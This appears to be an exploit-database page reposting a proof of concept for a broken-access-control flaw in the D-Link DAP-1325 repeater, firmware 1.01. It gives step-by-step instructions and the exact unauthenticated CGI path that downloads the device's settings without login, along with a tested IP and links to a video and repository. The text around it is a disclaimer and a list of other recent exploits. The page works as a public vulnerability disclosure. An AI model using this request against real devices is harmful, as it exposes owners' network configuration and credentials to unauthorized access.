Dlink dap1325 broken access control Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2023-07-03 | Type : webapps | Platform : hardware
This exploit / vulnerability Dlink dap1325 broken access control is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# Exploit Title: D-Link DAP-1325 - Broken Access Control
# Date: 27-06-2023
# Exploit Author: ieduardogoncalves
# Contact : twitter.com/0x00dia
# Vendor : www.dlink.com
# Version: Hardware version: A1
# Firmware version: 1.01
# Tested on:All Platforms


1) Description

Security vulnerability known as "Unauthenticated access to settings" or "Unauthenticated configuration download". This vulnerability occurs when a device, such as a repeater, allows the download of user settings without requiring proper authentication.


IN MY CASE,
Tested repeater IP: http://192.168.0.21/

Video POC : https://www.dropbox.com/s/eqz0ntlzqp5472l/DAP-1325.mp4?dl=0

2) Proof of Concept

Step 1: Go to
Repeater Login Page : http://192.168.0.21/

Step 2:
Add the payload to URL.

Payload:
http://{ip}/cgi-bin/ExportSettings.sh

Payload:
https://github.com/eeduardogoncalves/exploit

Dlink dap1325 broken access control


Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php
▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple
▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php



Tags:
Dlink dap1325 broken access control Vulnerability / Exploit